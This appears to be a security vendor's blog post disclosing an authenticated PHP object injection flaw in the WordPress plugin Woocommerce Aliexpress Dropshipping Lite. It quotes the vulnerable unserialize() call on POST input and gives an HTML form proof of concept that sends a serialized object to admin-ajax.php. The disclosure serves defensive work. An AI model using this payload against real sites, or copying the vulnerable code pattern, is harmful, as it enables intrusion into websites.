10 Aug

Our Proactive Monitoring Caught an Authenticated PHP Object Injection Vulnerability in a Brand New Plugin

One of the ways we help to improve the security of WordPress plugins, not just for our customers, but for everyone using them, is the proactive monitoring of changes made to plugins in the Plugin Directory to try to catch serious vulnerabilities before they are exploited. That sometimes leads to us catching a vulnerability of a more limited variant of one of those serious vulnerability types, which isn’t as much concern for the average website, but could be utilized in a targeted attack. That happened with the authenticated PHP object injection vulnerability we found in a brand new plugin, Woocommerce Aliexpress Dropshipping Lite. This vulnerability could allow an attacker that had access to a WordPress account to exploit a PHP object injection vulnerability. It also could have allowed an attacker that could get a user logged in to WordPress to visit a URL the attacker controls, to exploit the vulnerability as well.

Since the check used to spot this is also included in our Plugin Security Checker (which  is accessible through a WordPress plugin of its own), it is another of reminder of how that can help to indicate which plugins are in greater need of security review (for which we do as part of our service as well as separately).

The vulnerability occurs in the function CedWad_addProductToBunch(). That function, which is located in the file /admin/class-CedWad-admin.php, passes the value of the POST input “productData” through the unserialize() function, which could lead to PHP object injection:

460
461
462
463
464
465
public function CedWad_addProductToBunch(){
	$products = array();
	$filterId = isset( $_POST['filterId'] ) ? sanitize_text_field($_POST['filterId']) : "";
	$bunchId = isset( $_POST['bunchId'] ) ? sanitize_text_field($_POST['bunchId']) : "";
	$productId = isset( $_POST['productId'] ) ? sanitize_text_field($_POST['productId']) : "";
	$productData = isset( $_POST['productData'] ) ? unserialize(stripslashes($_POST['productData'])) : array();

That function is accessible through WordPress’ AJAX functionality to anyone logged in to WordPress:

71
add_action('wp_ajax_CedWad_addProductToBunch', array($this, 'CedWad_addProductToBunch'));

We notified the developer of the issue a month ago. They responded four days later and said an update was in the works, but no new version has been released to fix the issue. In line with our disclosure policy, which is based on the need to provide our customers with information on vulnerabilities on a timely basis, we are now disclosing this vulnerability.

Proof of Concept

With our plugin for testing for PHP object injection installed and activated, the following proof of concept will cause the message “PHP object injection has occurred.” be shown, when logged in to WordPress.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=CedWad_addProductToBunch" method="POST">
<input type="hidden" name="productData" value='O:20:"php_object_injection":0:{}' />
<input type="submit" value="Submit" />
</form>
</body>

Timeline

  • July 12, 2018 – Developer notified.
  • July 16, 2018 – Developer responds.

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us we review the plugin for issues that hackers would exploit if the knew about them as well as making sure that that needed security checks have been implemented in the plugin. If you order two reviews you will receive free lifetime subscription to our service.

Leave a Reply

Your email address will not be published. Required fields are marked *